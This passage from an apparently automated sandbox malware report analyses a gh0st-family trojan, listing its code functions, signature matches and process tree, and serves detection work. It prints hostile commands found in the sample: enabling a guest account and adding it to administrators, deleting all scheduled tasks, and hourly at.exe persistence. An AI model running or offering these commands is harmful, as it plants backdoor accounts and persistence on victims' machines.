          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100430D032_2_100430D0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001D8F032_2_1001D8F0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002F90032_2_1002F900
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003311032_2_10033110
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003791032_2_10037910
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002392032_2_10023920
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002992032_2_10029920
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1005892032_2_10058920
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003116032_2_10031160
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003516032_2_10035160
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004396032_2_10043960
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004218032_2_10042180
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003D99032_2_1003D990
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004499032_2_10044990
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100329A032_2_100329A0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001E9B032_2_1001E9B0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100419B032_2_100419B0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003F9E032_2_1003F9E0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10055A0B32_2_10055A0B
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003223032_2_10032230
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003B23032_2_1003B230
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002F24032_2_1002F240
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10033A4032_2_10033A40
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1006924032_2_10069240
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001F25032_2_1001F250
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004D25032_2_1004D250
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10038A7032_2_10038A70
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003D27032_2_1003D270
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003CA8032_2_1003CA80
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10042A8032_2_10042A80
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1005029F32_2_1005029F
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10031AA032_2_10031AA0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002D2B032_2_1002D2B0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100392C032_2_100392C0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001E2D032_2_1001E2D0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003E2F032_2_1003E2F0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100572F032_2_100572F0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001BB0032_2_1001BB00
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003A30032_2_1003A300
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10050B1532_2_10050B15
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002435032_2_10024350
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003EB5032_2_1003EB50
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004235032_2_10042350
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1005436832_2_10054368
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1005236B32_2_1005236B
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004338032_2_10043380
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004B3A032_2_1004B3A0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10041BA032_2_10041BA0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10017BD032_2_10017BD0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10035BD032_2_10035BD0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001D3E032_2_1001D3E0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001BC0032_2_1001BC00
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10018C1032_2_10018C10
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003741032_2_10037410
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002EC2032_2_1002EC20
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10036C2032_2_10036C20
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1005643032_2_10056430
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004C44032_2_1004C440
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1005544D32_2_1005544D
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003445032_2_10034450
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003BC6032_2_1003BC60
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001DC8032_2_1001DC80
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100364A032_2_100364A0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10040CA032_2_10040CA0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100354C032_2_100354C0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002D4D032_2_1002D4D0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001750032_2_10017500
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10052D1732_2_10052D17
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003DD2032_2_1003DD20
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004252032_2_10042520
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004DD3032_2_1004DD30
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1005154732_2_10051547
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003AD4032_2_1003AD40
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10042D5032_2_10042D50
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10041D6032_2_10041D60
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10038D7032_2_10038D70
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003957032_2_10039570
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001EDA032_2_1001EDA0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001E5B032_2_1001E5B0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10039DB032_2_10039DB0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10023DC032_2_10023DC0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10065DC032_2_10065DC0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100155CE32_2_100155CE
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003C5F032_2_1003C5F0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003D60032_2_1003D600
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1006662032_2_10066620
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10067E3032_2_10067E30
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10034E5032_2_10034E50
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004B65032_2_1004B650
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004066032_2_10040660
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10058E7032_2_10058E70
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10064E8032_2_10064E80
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10015EA032_2_10015EA0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100646B032_2_100646B0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10047EF032_2_10047EF0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10041F2032_2_10041F20
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001CF3032_2_1001CF30
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003B73032_2_1003B730
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002975032_2_10029750
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1005376632_2_10053766
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10054F6A32_2_10054F6A
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003877032_2_10038770
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10051F7932_2_10051F79
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10016F8032_2_10016F80
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10044F8032_2_10044F80
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10043F9032_2_10043F90
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10037FA032_2_10037FA0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100427B032_2_100427B0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002FFC032_2_1002FFC0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001DFE032_2_1001DFE0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10036FE032_2_10036FE0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002CFF032_2_1002CFF0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10045FF032_2_10045FF0
          Source: ILQ18dgzMU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: dump.pcap, type: PCAPMatched rule: gh0st author = https://github.com/jackcr/
          Source: 00000000.00000002.4082870617.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: gh0st author = https://github.com/jackcr/
          Source: 00000000.00000003.3947674150.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: gh0st author = https://github.com/jackcr/
          Source: 00000000.00000003.3090838933.0000000002150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: gh0st author = https://github.com/jackcr/
          Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@64/4@6/1
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10012110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,0_2_10012110
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10012110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,32_2_10012110
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100084F0 GetLogicalDriveStringsA,GetVolumeInformationA,SHGetFileInfo,lstrlen,lstrlen,lstrlen,GetDiskFreeSpaceExA,GetDriveTypeA,lstrlen,0_2_100084F0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100018A0 wsprintfA,CreateToolhelp32Snapshot,Process32First,_strcmpi,GetCurrentProcessId,OpenProcess,GetModuleFileNameExA,K32GetModuleFileNameExA,_strcmpi,CloseHandle,Process32Next,CloseHandle,0_2_100018A0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10019900 CoCreateInstance,SysFreeString,0_2_10019900
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100098B0 CloseHandle,CreateThread,??2@YAPAXI@Z,FindResourceA,LoadResource,LockResource,??3@YAXPAX@Z,0_2_100098B0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10010E20 OpenSCManagerA,OpenServiceA,QueryServiceStatus,ControlService,Sleep,DeleteService,RegDeleteKeyA,OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,OpenSCManagerA,OpenServiceA,LockServiceDatabase,OpenSCManagerA,OpenServiceA,LockServiceDatabase,OpenSCManagerA,OpenServiceA,ControlService,CloseServiceHandle,OpenSCManagerA,OpenServiceA,LockServiceDatabase,ChangeServiceConfigA,UnlockServiceDatabase,CloseServiceHandle,CloseServiceHandle,Sleep,0_2_10010E20
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeMutant created: \Sessions\1\BaseNamedObjects\AAAAAA9PT0vfT4rqenp70A/Pqpp6+vr58= BBBBBB9PT0vf4Fr7K0sr0A/Pqpp6+vr58= CCCCCC9PT0vQXpr7K0sr0A/Pqpp6+vr58= GGGGGG4wIF/vL7858= XXXXXX579E5A5B VVVVVVrr2unw==
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\JH.BAT""
          Source: ILQ18dgzMU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: ILQ18dgzMU.exeReversingLabs: Detection: 94%
          Source: ILQ18dgzMU.exeString found in binary or memory: cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add
          Source: svchsot.exeString found in binary or memory: cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeFile read: C:\Users\user\Desktop\ILQ18dgzMU.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\ILQ18dgzMU.exe "C:\Users\user\Desktop\ILQ18dgzMU.exe"
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\JH.BAT""
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /delete /tn * /f
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config Schedule start= auto
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net start "Task Scheduler"
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 start "Task Scheduler"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 0:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 1:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 2:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 3:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 4:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 5:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 6:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 7:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 8:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 9:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 10:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 11:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 12:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 13:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 14:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 15:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 16:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 17:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 18:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 19:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 20:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 21:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 22:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 23:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 24:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: unknownProcess created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe "C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe"
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\JH.BAT""Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /delete /tn * /fJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config Schedule start= autoJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net start "Task Scheduler"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 0:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 1:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 2:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 3:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 4:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 5:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 6:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 7:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 8:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 9:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 10:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 11:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 12:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 13:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 14:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 15:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 16:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 17:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 18:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 19:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 20:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 21:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
